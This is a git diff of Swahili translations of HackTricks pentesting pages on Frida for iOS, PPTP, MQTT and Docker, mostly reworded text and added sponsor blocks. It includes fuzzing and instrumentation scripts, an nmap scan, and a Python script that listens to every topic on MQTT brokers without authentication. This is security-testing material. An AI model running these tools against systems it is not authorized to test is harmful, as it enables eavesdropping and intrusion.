+- **Kupeleleza Maktaba za Asili:** +- [Kupeleleza Maktaba za Asili za Android Kwa Kutumia JEB Decompiler](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3) diff --git a/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md b/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md index 55d4bbfd4..0ac4d7c84 100644 --- a/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md +++ b/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md @@ -9,11 +9,25 @@ Njia nyingine za kusaidia HackTricks: * Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)! * Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) * Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee -* **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** +* **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za kuiba**. + +Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa. + +Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa: + +{% embed url="https://whiteintel.io" %} + +--- + ## Kusakinisha Frida **Hatua za kusakinisha Frida kwenye kifaa kilichofunguliwa kwa Jailbreak:** @@ -21,10 +35,10 @@ Njia nyingine za kusaidia HackTricks: 1. Fungua programu ya Cydia/Sileo. 2. Nenda kwa Usimamizi -> Vyanzo -> Hariri -> Ongeza. 3. Ingiza "https://build.frida.re" kama URL. -4. Nenda kwenye chanzo kipya cha Frida kilichoongezwa. +4. Nenda kwenye chanzo cha Frida kilichoongezwa hivi karibuni. 5. Sakinisha pakiti ya Frida. -Ikiwa unatumia **Corellium** utahitaji kupakua kutoleo la Frida kutoka [https://github.com/frida/frida/releases](https://github.com/frida/frida/releases) (`frida-gadget-[yourversion]-ios-universal.dylib.gz`) na kufungua na kunakili kwenye eneo la dylib ambalo Frida inahitaji, k.m.: `/Users/[youruser]/.cache/frida/gadget-ios.dylib` +Ikiwa unatumia **Corellium** utahitaji kupakua kutolewa kwa Frida kutoka [https://github.com/frida/frida/releases](https://github.com/frida/frida/releases) (`frida-gadget-[yourversion]-ios-universal.dylib.gz`) na kufungua na kunakili kwenye eneo la dylib ambalo Frida inahitaji, k.m.: `/Users/[youruser]/.cache/frida/gadget-ios.dylib` Baada ya kusakinishwa, unaweza kutumia amri **`frida-ls-devices`** kwenye PC yako na kuhakikisha kuwa kifaa kinaonekana (PC yako inahitaji kuweza kufikia).\ Tumia pia **`frida-ps -Uia`** kuchunguza michakato inayoendeshwa kwenye simu. @@ -63,13 +77,13 @@ frida-trace -U -m "*[NE* *authentication*]" ## To hook a plugin that is momentarely executed prepare Frida indicating the ID of the Plugin binary frida-trace -U -W -m '*[* *]' ``` -### Pata darasa zote na njia +### Pata madarasa yote na njia -* Kukamilisha moja kwa moja: Tekeleza tu `frida -U ` +* Kukamilisha moja kwa moja: Tekeleza `frida -U `
-* Pata **darasa zote** zilizopo (panga kwa kutumia string) +* Pata **madarasa** yote yanayopatikana (pambanua kwa herufi) {% code title="/tmp/script.js" %} ```javascript @@ -91,9 +105,7 @@ console.log("Objective-C runtime is not available."); ``` {% endcode %} -* Pata **njia zote** za **darasa** (panga kwa kamba) - -{% code title="/tmp/script.js" %} +* Pata **njia zote** za **darasa** (panga kwa kutumia herufi) ```javascript // frida -U -l /tmp/script.js @@ -157,7 +169,7 @@ console.log("loaded"); Unayo mfano unaoendeleza Frida Stalker katika [https://github.com/poxyran/misc/blob/master/frida-stalker-example.py](https://github.com/poxyran/misc/blob/master/frida-stalker-example.py) -Huu ni mfano mwingine wa kuambatisha Frida Stalker kila wakati kazi inaitwa: +Hii ni mfano mwingine wa kuambatisha Frida Stalker kila wakati kazi inaitwa: ```javascript console.log("loading"); const wg_log_addr = Module.findExportByName("", ""); @@ -191,12 +203,12 @@ Stalker.flush(); // this is important to get all events }); ``` {% hint style="danger" %} -Hii ni ya kuvutia kwa madhumuni ya kutatua matatizo lakini kwa fuzzing, kuwa mara kwa mara **`.follow()`** na **`.unfollow()`** ni ya ufanisi sana. +Hii ni ya kuvutia kwa madhumuni ya kutatua matatizo lakini kwa fuzzing, kuwa kila wakati **`.follow()`** na **`.unfollow()`** ni ya ufanisi sana. {% endhint %} ## [Fpicker](https://github.com/ttdennis/fpicker) -[**fpicker**](https://github.com/ttdennis/fpicker) ni **zana ya kufanya fuzzing kwa kutumia Frida** ambayo inatoa aina mbalimbali za modes za fuzzing kwa fuzzing ndani ya mchakato, kama vile mode ya AFL++ au mode ya kufuatilia kwa upande. Inapaswa kuendesha kwenye majukwaa yote yanayoungwa mkono na Frida. +[**fpicker**](https://github.com/ttdennis/fpicker) ni **zana ya kufanya fuzzing kwa kutumia Frida** ambayo inatoa aina mbalimbali za modes za fuzzing kwa fuzzing ndani ya mchakato, kama vile mode ya AFL++ au mode ya kufuatilia pasifiki. Inapaswa kuendesha kwenye majukwaa yote yanayoungwa mkono na Frida. * [**Sakinisha fpicker**](https://github.com/ttdennis/fpicker#requirements-and-installation) **& radamsa** ```bash @@ -217,7 +229,7 @@ make fpicker-[yourOS] # fpicker-macos # Install radamsa (fuzzer generator) brew install radamsa ``` -* **Jitayarisha FS:** +* **Jipange kwa FS:** ```bash # From inside fpicker clone mkdir -p examples/wg-log # Where the fuzzing script will be @@ -298,7 +310,7 @@ rpc.exports.fuzzer = f; ## Compile from "myfuzzer.js" to "harness.js" frida-compile examples/wg-log/myfuzzer.js -o harness.js ``` -* Piga fuzzer **`fpicker`** ukitumia **`radamsa`**: +* Piga fuzzer **`fpicker`** kutumia **`radamsa`**: {% code overflow="wrap" %} ```bash @@ -309,7 +321,7 @@ fpicker -v --fuzzer-mode active -e attach -p -D usb -o example {% endcode %} {% hint style="danger" %} -Katika kesi hii **hatuendi kuanza upya programu au kurejesha hali** baada ya kila mzigo. Kwa hivyo, ikiwa Frida inapata **kosa**, **vipimo vya baadaye** baada ya mzigo huo pia inaweza **kusababisha programu kugonga** (kwa sababu programu iko katika hali isiyo thabiti) hata ikiwa **kuingia haipaswi kusababisha** programu kugonga. +Katika kesi hii **hatuendi kuanza upya programu au kurejesha hali** baada ya kila mzigo. Kwa hivyo, ikiwa Frida inapata **kosa**, **matokeo ya kuingiza** baada ya mzigo huo pia yanaweza **kusababisha programu kugonga** (kwa sababu programu iko katika hali isiyo thabiti) hata kama **kuingiza haipaswi kusababisha** programu kugonga. Zaidi ya hayo, Frida itaunganisha ishara za kipekee za iOS, kwa hivyo wakati **Frida inapata kosa**, labda **ripoti za kugonga za iOS hazitazalishwa**. @@ -320,7 +332,7 @@ Ili kuzuia hili, kwa mfano, tunaweza kuanza upya programu baada ya kila kugonga Unaweza kuangalia **konsoli ya macOS** au **cli ya `log`** kuangalia kumbukumbu za macOS.\ Unaweza pia kuangalia kumbukumbu kutoka iOS kwa kutumia **`idevicesyslog`**.\ -Baadhi ya kumbukumbu zitakosa taarifa kwa kuongeza **``**. Ili kuonyesha taarifa zote unahitaji kusakinisha wasifu fulani kutoka [https://developer.apple.com/bug-reporting/profiles-and-logs/](https://developer.apple.com/bug-reporting/profiles-and-logs/) kuwezesha taarifa hizo za binafsi. +Baadhi ya kumbukumbu zitakosa taarifa kwa kuongeza **``**. Ili kuonyesha taarifa zote unahitaji kusakinisha wasifu fulani kutoka [https://developer.apple.com/bug-reporting/profiles-and-logs/](https://developer.apple.com/bug-reporting/profiles-and-logs/) kuwezesha taarifa hizo za kibinafsi. Ikiwa hujui cha kufanya: ```sh @@ -359,9 +371,23 @@ iOS inahifadhi ajali 25 za programu ile ile tu, hivyo unahitaji kusafisha hiyo a * [https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida](https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida) + +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa utendaji wa **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**. + +Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba taarifa. + +Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** hapa: + +{% embed url="https://whiteintel.io" %} + +
-Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! +Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)! Njia nyingine za kusaidia HackTricks: @@ -369,6 +395,6 @@ Njia nyingine za kusaidia HackTricks: * Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) * Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee * **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** -* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. +* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
diff --git a/network-services-pentesting/1723-pentesting-pptp.md b/network-services-pentesting/1723-pentesting-pptp.md index 4296555c4..2c0e18327 100644 --- a/network-services-pentesting/1723-pentesting-pptp.md +++ b/network-services-pentesting/1723-pentesting-pptp.md @@ -1,34 +1,4 @@ -# 1723 - Pentesting PPTP - -
- -Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)! - -Njia nyingine za kusaidia HackTricks: - -* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)! -* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com) -* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
- -## Taarifa Msingi - -**Point-to-Point Tunneling Protocol (PPTP)** ni njia inayotumiwa sana kwa **upatikanaji wa kijijini** kwa vifaa vya simu. Inatumia **bandari ya TCP 1723** kwa kubadilishana funguo, wakati **itifaki ya IP 47** (Generic Routing Encapsulation, au **GRE**), inatumika kusimbua data inayotumwa kati ya wenzake. Hii ni muhimu kwa kuanzisha njia salama ya mawasiliano juu ya mtandao, ikihakikisha kuwa data inayobadilishwa inabaki kuwa ya siri na inalindwa dhidi ya ufikiaji usioidhinishwa. - -**Bandari ya Default**: 1723 - -## Uchunguzi -```bash -nmap –Pn -sSV -p1723 -``` -### [Brute Force](../generic-methodologies-and-resources/brute-force.md#pptp) - -## Vulnerabilities -* [https://www.schneier.com/academic/pptp/](https://www.schneier.com/academic/pptp/) -* [https://github.com/moxie0/chapcrack](https://github.com/moxie0/chapcrack) +# 1723 - Kupima Usalama wa PPTP
@@ -36,10 +6,54 @@ nmap –Pn -sSV -p1723 Njia nyingine za kusaidia HackTricks: -* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)! -* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com) +* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)! +* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) * Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee * **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. + +
+ +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wamedukuliwa na **malware za wizi**. + +Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa. + +Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa: + +{% embed url="https://whiteintel.io" %} + +--- + +## Taarifa Msingi + +**Itifaki ya Point-to-Point Tunneling Protocol (PPTP)** ni njia inayotumiwa sana kwa ajili ya **upatikanaji wa mbali** kwenye vifaa vya simu. Inatumia **bandari ya TCP 1723** kwa kubadilishana funguo, wakati **itifaki ya IP 47** (Generic Routing Encapsulation, au **GRE**), hutumika kusimbua data inayotumwa kati ya wenzao. Hii ni muhimu kwa kuanzisha njia salama ya mawasiliano kupitia mtandao, ikihakikisha kuwa data inayobadilishwa inabaki kuwa ya siri na kulindwa dhidi ya ufikiaji usioidhinishwa. + +**Bandari ya Msingi**: 1723 + +## Uorodheshaji +```bash +nmap –Pn -sSV -p1723 +``` +### [Kujaribu Kuvunja](../generic-methodologies-and-resources/brute-force.md#pptp) + +## Mapungufu +* [https://www.schneier.com/academic/pptp/](https://www.schneier.com/academic/pptp/) +* [https://github.com/moxie0/chapcrack](https://github.com/moxie0/chapcrack) + +
+ +Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! + +Njia nyingine za kusaidia HackTricks: + +* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)! +* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) +* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee +* **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
diff --git a/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md b/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md index 07a6f257c..e40bf83b6 100644 --- a/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md +++ b/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md @@ -2,21 +2,35 @@
-Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! +Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)! Njia nyingine za kusaidia HackTricks: * Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)! * Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) -* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee +* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee * **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** -* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. +* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
+## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**. + +Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa. + +Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa: + +{% embed url="https://whiteintel.io" %} + +--- + ## Taarifa Msingi -**MQ Telemetry Transport (MQTT)** inajulikana kama **itifaki ya ujumbe wa kuchapisha/kusikiliza** ambayo inajulikana kwa unyenyekevu wake wa kipekee na uzito wake mdogo. Itifaki hii imeundwa mahsusi kwa mazingira ambapo vifaa vina uwezo mdogo na vinatumika kwenye mitandao ambayo inajulikana kwa upungufu wa wigo wa bandari, kuchelewa kwa juu, au uhusiano usioaminika. Malengo makuu ya MQTT ni pamoja na kupunguza matumizi ya wigo wa mtandao na kupunguza mahitaji kwenye rasilimali za kifaa. Aidha, inalenga kudumisha mawasiliano yanayoweza kutegemewa na kutoa kiwango fulani cha uhakikisho wa utoaji. Malengo haya hufanya MQTT iweze kufaa sana kwa uwanja unaokua wa **mawasiliano ya mashine-kwa-mashine (M2M)** na **Intaneti ya Vitu (IoT)**, ambapo ni muhimu kuunganisha vifaa vingi kwa ufanisi. Zaidi ya hayo, MQTT ni muhimu sana kwa programu za simu, ambapo kuhifadhi wigo na maisha ya betri ni muhimu. +**MQ Telemetry Transport (MQTT)** inajulikana kama **itifaki ya ujumbe wa kuchapisha/kusikiliza** ambayo inajulikana kwa unyenyekevu na uzito wake. Itifaki hii imeundwa mahsusi kwa mazingira ambapo vifaa vina uwezo mdogo na vinatumika kwenye mitandao ambayo inajulikana kwa upungufu wa wigo wa bandari, kuchelewa kwa juu, au uhusiano usioaminika. Malengo makuu ya MQTT ni pamoja na kupunguza matumizi ya wigo wa mtandao na kupunguza mahitaji kwenye rasilimali za kifaa. Aidha, inalenga kudumisha mawasiliano yanayoweza kutegemewa na kutoa kiwango fulani cha uhakikisho wa utoaji. Malengo haya hufanya MQTT iweze kufaa sana kwa uga unaoongezeka wa **mawasiliano ya mashine-kwa-mashine (M2M)** na **Intaneti ya Vitu (IoT)**, ambapo ni muhimu kuunganisha vifaa vingi kwa ufanisi. Zaidi ya hayo, MQTT ni muhimu sana kwa programu za simu, ambapo kuhifadhi wigo wa bandari na maisha ya betri ni muhimu. **Bandari ya msingi:** 1883 ``` @@ -25,9 +39,9 @@ PORT STATE SERVICE REASON ``` ## Kuchunguza trafiki -Wakati pakiti ya **CONNECT** inapopokelewa na wakala wa MQTT, pakiti ya **CONNACK** hutumwa kujibu. Pakiti hii ina msimbo wa kurudi ambao ni muhimu kwa kuelewa hali ya uhusiano. Msimbo wa kurudi wa **0x00** una maana kuwa anwani za siri zimekubaliwa, ikionyesha uhusiano uliofanikiwa. Kwa upande mwingine, msimbo wa kurudi wa **0x05** unamaanisha kuwa anwani za siri si sahihi, hivyo kuzuia uhusiano. +Wakati pakiti ya **CONNECT** inapopokelewa na wakala wa MQTT, pakiti ya **CONNACK** hutumwa kujibu. Pakiti hii ina msimbo wa kurudi ambao ni muhimu kwa kuelewa hali ya uunganisho. Msimbo wa kurudi wa **0x00** una maana kuwa anwani za siri zimekubaliwa, ikionyesha uunganisho uliofanikiwa. Kwa upande mwingine, msimbo wa kurudi wa **0x05** unamaanisha kuwa anwani za siri ni batili, hivyo kuzuia uunganisho. -Kwa mfano, ikiwa wakala anakataa uhusiano kutokana na anwani za siri zisizo sahihi, hali ingeonekana kama hii: +Kwa mfano, ikiwa wakala atakataa uunganisho kutokana na anwani za siri batili, hali itaonekana kama ifuatavyo: ``` { "returnCode": "0x05", @@ -36,11 +50,11 @@ Kwa mfano, ikiwa wakala anakataa uhusiano kutokana na anwani za siri zisizo sahi ``` ![](<../.gitbook/assets/image (973).png>) -### [**Kuvunja Nguvu MQTT**](../generic-methodologies-and-resources/brute-force.md#mqtt) +### [**Kuforce MQTT**](../generic-methodologies-and-resources/brute-force.md#mqtt) ## Pentesting MQTT -**Uthibitishaji ni hiari kabisa** na hata kama uthibitishaji unafanywa, **encryption haiitwi kwa chaguo-msingi** (vitambulisho hutolewa kwa maandishi wazi). Mashambulizi ya MITM bado yanaweza kutekelezwa kuiba nywila. +**Uthibitisho ni hiari kabisa** na hata kama uthibitisho unafanywa, **encryption haiitumiwi kwa chaguo-msingi** (mikopo hutumwa kwa maandishi wazi). Mashambulizi ya MITM bado yanaweza kutekelezwa kuiba nywila. Kuunganisha kwenye huduma ya MQTT unaweza kutumia: [https://github.com/bapowell/python-mqtt-client-shell](https://github.com/bapowell/python-mqtt-client-shell) na kujisajili kwenye mada zote kwa kufanya: ``` @@ -56,7 +70,7 @@ apt-get install mosquitto mosquitto-clients mosquitto_sub -t 'test/topic' -v #Subscribe to 'test/topic' mosquitto_sub -h -t "#" -v #Subscribe to ALL topics. ``` -Au unaweza **kutekeleza nambari hii ili kujaribu kuunganisha kwenye huduma ya MQTT bila uthibitishaji, kusajili kila mada na kuzisikiliza**: +Au unaweza **kutekeleza nambari hii ili kujaribu kuunganisha kwenye huduma ya MQTT bila uthibitisho, kusajili kila mada na kuzisikiliza**: ```python #This is a modified version of https://github.com/Warflop/IOT-MQTT-Exploit/blob/master/mqtt.py import paho.mqtt.client as mqtt @@ -93,9 +107,9 @@ kutoka hapa: [https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b](ht Mfano wa kuchapisha/kusikiliza unajumuisha: -* **Mchapishaji**: huchapisha ujumbe kwa mada moja (au nyingi) kwenye mpatanishi. -* **Msikilizaji**: anasikiliza mada moja (au nyingi) kwenye mpatanishi na kupokea ujumbe wote uliotumwa na mchapishaji. -* **Mpatanishi**: huarifu ujumbe wote kutoka kwa wachapishaji kwenda kwa wasikilizaji. +* **Mchapishaji**: huchapisha ujumbe kwa moja (au zaidi) ya mada katika mpatanishi. +* **Msikilizaji**: anajiandikisha kwa moja (au zaidi) ya mada katika mpatanishi na kupokea ujumbe wote uliotumwa na mchapishaji. +* **Mpatanishi**: huarifu ujumbe wote kutoka kwa wachapishaji kwa wasikilizaji. * **Mada**: inajumuisha kiwango kimoja au zaidi kilichotenganishwa na mstari wa mbele (k.m., /smartshouse/livingroom/temperature). ### Muundo wa Pakiti @@ -107,17 +121,17 @@ Kila pakiti ya MQTT ina kichwa kilichofungwa (Mchoro 02).Mchoro 02: Kichwa Kilic ### Aina za Pakiti * CONNECT (1): Kuanzishwa na mteja kuomba uhusiano kwa seva. -* CONNACK (2): Kuthibitisha seva ya uhusiano uliofanikiwa. +* CONNACK (2): Kuthibitishwa kwa seva kwa uhusiano uliofanikiwa. * PUBLISH (3): Hutumiwa kutuma ujumbe kutoka kwa mteja kwenda kwa seva au kinyume chake. * PUBACK (4): Kuthibitisha pakiti ya PUBLISH. -* PUBREC (5): Sehemu ya itifaki ya utoaji ujumbe ikidhibitisha ujumbe umepokelewa. +* PUBREC (5): Sehemu ya itifaki ya utoaji ujumbe ikihakikisha ujumbe unapokelewa. * PUBREL (6): Hakikisho zaidi katika utoaji wa ujumbe, ikionyesha kutolewa kwa ujumbe. * PUBCOMP (7): Sehemu ya mwisho ya itifaki ya utoaji ujumbe, ikionyesha kukamilika. * SUBSCRIBE (8): Ombi la mteja kusikiliza ujumbe kutoka kwa mada. -* SUBACK (9): Kuthibitisha ya seva ya ombi la SUBSCRIBE. +* SUBACK (9): Kuthibitishwa kwa seva ya ombi la SUBSCRIBE. * UNSUBSCRIBE (10): Ombi la mteja kuacha kupokea ujumbe kutoka kwa mada. * UNSUBACK (11): Majibu ya seva kwa ombi la UNSUBSCRIBE. -* PINGREQ (12): Ujumbe wa moyo unatumwa na mteja. +* PINGREQ (12): Ujumbe wa moyo wa kupelekwa na mteja. * PINGRESP (13): Majibu ya seva kwa ujumbe wa moyo. * DISCONNECT (14): Kuanzishwa na mteja kumaliza uhusiano. * Thamani mbili, 0 na 15, zimewekwa kama zilizohifadhiwa na matumizi yao ni marufuku. @@ -126,6 +140,18 @@ Kila pakiti ya MQTT ina kichwa kilichofungwa (Mchoro 02).Mchoro 02: Kichwa Kilic * `port:1883 MQTT` +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa utendaji wa **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**. + +Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za wizi wa habari. + +Unaweza kutembelea tovuti yao na kujaribu injini yao kwa **bure** hapa: + +{% embed url="https://whiteintel.io" %} +
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)! diff --git a/network-services-pentesting/2375-pentesting-docker.md b/network-services-pentesting/2375-pentesting-docker.md index b7898ce8f..28d04564e 100644 --- a/network-services-pentesting/2375-pentesting-docker.md +++ b/network-services-pentesting/2375-pentesting-docker.md @@ -1,32 +1,46 @@ -# 2375, 2376 Kupima Docker +# 2375, 2376 Kupima Usalama wa Docker
-Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! +Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! Njia nyingine za kusaidia HackTricks: -* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)! +* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)! * Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) * Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee -* **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** -* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. +* **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** +* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks 